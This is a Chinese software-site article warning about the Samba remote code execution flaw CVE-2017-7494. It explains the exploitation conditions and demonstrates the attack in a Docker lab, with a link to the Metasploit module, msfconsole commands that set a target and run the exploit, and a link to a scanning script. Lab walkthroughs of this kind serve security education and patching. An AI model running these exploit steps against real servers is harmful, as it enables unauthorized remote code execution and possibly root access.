IT资讯/综合软件下载站!┆ 最新软件 最新文章 最新手机 UFO外星人 网站分类

您当前的位置→图文中心安全防范服务器版“永恒之蓝”高危预警 (Samba远程命令执行漏洞CVE-2017-7494) 攻击演示

服务器版“永恒之蓝”高危预警 (Samba远程命令执行漏洞CVE-2017-7494) 攻击演示


2017/5/25 16:23:24 编辑:admin 来源:本站整理 
今天给大家分享服务器版“永恒之蓝”高危预警 (Samba远程命令执行漏洞CVE-2017-7494) 攻击演示安全防范文章。喜欢的可以分享服务器版“永恒之蓝”高危预警 (Samba远程命令执行漏洞CVE-2017-7494) 攻击演示给你的好友。 喜欢安全防范这篇文章的网友不妨去看看下面的文章:
  • 服务器版“永恒之蓝”高危预警 (Samba远程命令执行漏洞CVE-2017-7494) 攻击演...▼去看看
  • 漏洞信息:

    2017年5月24日Samba发布了4.6.4版本, 中间修复了一个严重的远程代码执行漏洞, 漏洞编号CVE-2017-7494, 漏洞影响了Samba 3.5.0 之后到4.6.4/4.5.10/4.4.14中间的所有版本。

    漏洞利用条件:

    1. 服务器打开了文件/打印机共享端口445, 让其能够在公网上访问

    2. 共享文件拥有写入权限

    3. 恶意攻击者需猜解Samba服务端共享目录的物理路径

    满足以上条件时, 由于Samba能够为选定的目录创建网络共享, 当恶意的客户端连接上一个可写的共享目录时, 通过上传恶意的链接库文件, 使服务端程序加载并执行它, 从而实现远程代码执行。 根据服务器的情况, 攻击者还有可能以root身份执

    测试环境:

    在docker下搭建测试环境

    1.拉取镜像到本地

    root@backlion-virtual-machine:/home/backlion# docker pull medicean/vulapps:s_samba_1

    2.启动环境, 并将虚拟的445端口映射到物理机的445端口上:

    root@backlion-virtual-machine:/home/backlion# docker run -d -p 445:445 -p 139:139 -p 138:138 -p 137:137 medicean/vulapps:s_samba_1

    3.在msf下的利用(kali主机IP: 10.0.0.140, 靶机下的ubuntu的物理住机IP:10.0.0.158)

    利用的poc:

    https://github.com/hdm/metasploit-framework/blob/0520d7cf76f8e5e654cb60f157772200c1b9e230/modules/exploits/linux/samba/is_known_pipename.rb

    将is_known_pipename.rb

    拷贝到/usr/share/metasploit-framework/modules/exploits/linux/samba/

    复制代码
    root@backlion:~# service postgresql startroot@backlion:~# msfconsolemsf > search is_known_pipenamemsf > use exploit/linux/samba/is_known_pipenamemsf exploit(is_known_pipename) > show optionsmsf exploit(is_known_pipename) > set rhost  10.0.0.158msf exploit(is_known_pipename) > set rport  445msf exploit(is_known_pipename) > exploit
    复制代码

     

    漏洞检查的NAMP脚本:

    http://ys-k.ys168.com/576161633/UIwHtkm3L3K3I865MJ6/samb.nse

    12下一页

    相关文章
  • 12306客服电话怎么转人工 12306客服电话人工服务热线及时间
  • windows 7下FTP服务器构建教程
  • 小果科技为场景金融提供技术服务
  • 苹果6月30日将彻底淘汰这些设备,不再提供维修服务
  • 服务器版“永恒之蓝”高危预警 (Samba远程命令执行漏洞CVE-2017-7494) 攻击演...
  • ASP 、PHP、JSP三者都是面向Web服务器的技术,客户端浏览器不需要任何附加的软件支持。...
  • 网站服务器需要考虑哪些方面?网站空间租用挑选技巧
  • QQ群推出的付费认证服务功能并支付300元认证费用
  • 相关推荐
  • 掌翼信使(新型企业移动信息应用服务平台) v2.0.0.3 官方版
  • 世纪证券朝阳版(新一代金融服务平台) v2.2.666 官方版
  • 河南省社会保障卡服务平台(河南社保卡服务平台地址) v2017 官方版
  • 2017免费空间服务器+域名大全集 稳定版 最新版
  • 石鼓文PDF转换服务器(pdf文件转换器) V1.2.1 官方版
  • 广联达服务新干线免费下载官方最新版
  • dedecms5.7传奇服务端模板 v5.25 最新版
  • 内蒙古中小学教师服务平台挂机学习软件 20170530 最新版
  • 发表评论
    栏目列表
    阅读排行
    网站帮助 - 广告合作 - 下载声明 - 网站地图